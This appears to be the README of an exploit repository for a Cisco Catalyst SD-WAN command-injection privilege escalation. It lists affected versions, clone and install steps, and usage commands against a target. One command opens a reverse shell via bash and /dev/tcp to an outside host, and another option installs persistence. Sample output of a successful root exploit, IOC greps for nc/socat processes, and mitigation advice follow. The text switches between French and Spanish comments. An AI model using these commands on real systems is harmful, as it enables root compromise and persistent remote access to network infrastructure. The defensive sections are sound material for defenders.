CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit

⚠️ AVERTISSEMENT
Ce code est UNIQUEMENT à des fins éducatives et de tests de sécurité autorisés.
📋 Description
CVE-2026-20245 est une vulnérabilité d'élévation de privilèges dans la CLI de Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage) et Cisco Catalyst SD-WAN Validator (vBond). Un attaquant authentifié avec des privilèges netadmin peut exécuter des commandes arbitraires en tant que root en chargeant un fichier spécialement conçu.
Détails Techniques
🎯 Versions Affectées
| Produit | Versions vulnérables |
|---|
| Cisco Catalyst SD-WAN Manager | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Controller (vSmart) | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Validator (vBond) | < 20.18.3.1 |
Versions spécifiques vulnérables :
- 20.9.x (tous)
- 20.10.x - 20.12.5.3
- 20.12.6 - 20.12.6.1
- 20.12.7
- 20.13.x - 20.15.4.3
- 20.15.5 - 20.15.5.1
- 20.16.x - 20.18.2.1
🔧 Installation
# Clonar repositorio
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC
# Instalar dependencias
pip install -r requirements.txt
# Dar permisos
chmod +x exploit.py
📦 Dépendances
🚀 Utilisation
Vérifier la version
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
Exécuter une commande
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
Shell inversé
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
Installer la persistance
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist
🔍 Sortie attendue
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit ║
║ Command Injection via Crafted File Upload ║
║ CVSS: 7.8 (High) | CISA KEV: 2026-06-09 ║
╚═══════════════════════════════════════════════════════════════════╝
[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload
============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================
🔍 Indicateurs de Compromission (IOCs)
Vérifier dans les logs (/var/log/scripts.log)
# Buscar actividad sospechosa
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log
# Comandos específicos a buscar
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
Fichiers suspects
- /home/admin/*.csv (fichiers CSV non autorisés)
- /tmp/*.csv
- /var/log/scripts.log avec des entrées inhabituelles
Processus
# Buscar procesos root inusuales
ps aux | grep -E "bash|sh|nc|ncat|socat"
🛡️ Atténuation
Option 1 - Mettre à jour vers une version corrigée (RECOMMANDÉ)
| Version | Correctif |
|---|
| 20.18.2.1 et antérieures | 20.18.3.1 |
Option 2 - Limiter l'accès
- Restreindre l'accès administratif au réseau de gestion
- Utiliser l'authentification multifacteur
- Surveiller l'activité de téléchargement CSV
Option 3 - Configuration sécurisée
# Deshabilitar upload de serial numbers si no es necesario
no feature upload-serial-numbers
# Limitar privilegios netadmin
admin privilege restrict
📚 Références
- Cisco Security Advisory
- NVD - CVE-2026-20245
- CISA KEV Catalog
📊 Chronologie
| Date | Événement |
|---|
| 2026-05-14 | Cisco publie l'avis initial |
| 2026-06-04 | CVE officiellement publié |
| 2026-06-09 | CISA ajoute au KEV |
| 2026-06-23 | Date limite CISA pour corriger |
⚖️ Disclaimer
Ce logiciel est fourni "tel quel", sans garantie. L'auteur n'est pas responsable d'une utilisation abusive. Utilisez-le uniquement sur des systèmes autorisés.